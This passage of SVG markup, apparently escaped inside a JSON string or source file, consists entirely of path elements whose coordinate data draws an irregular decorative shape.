d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n        <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n        <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n        <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n        <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n        <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n        <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n        <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n        <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n        <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n        <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n        <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n        <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n        <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n        <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n        <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n        <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n        <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n        <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n        <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n        <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n        <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n        <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n        <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n        <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n        <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n        <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n        <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n        <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n        <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n        <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n        <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n        <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n        <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n        <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n        <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n        <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n        <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n        <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n        <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n        <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n        <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n        <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n        <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n        <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n        <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n        <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n        <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n        <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n        <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n        <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n        <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n        <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n        <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n        <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n        <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n        <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n        <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n        <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n        <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n        <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n        <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n        <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n        <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n        <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n        <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n        <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n        <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n        <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n        <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n        <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n        <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n        <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n        <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n        <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n        <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n        <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n        <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n        <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n        <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n        <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n        <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n        <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n        <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n        <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n        <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n        <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n        <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n        <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n        <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n        <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n        <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n        <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n        <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n        <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n        <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n        <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n        <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n        <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n        <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n        <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n        <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n        <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n        <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n        <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n        <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n        <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n        <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n        <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n        <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n        <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n        <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n        <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n        <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n        <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n        <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n        <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n        <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n        <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n        <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n        <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n        <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n        <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n        <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n        <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n        <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n        <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n        <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n        <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n        <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n        <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n        <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n        <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n        <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n        <path 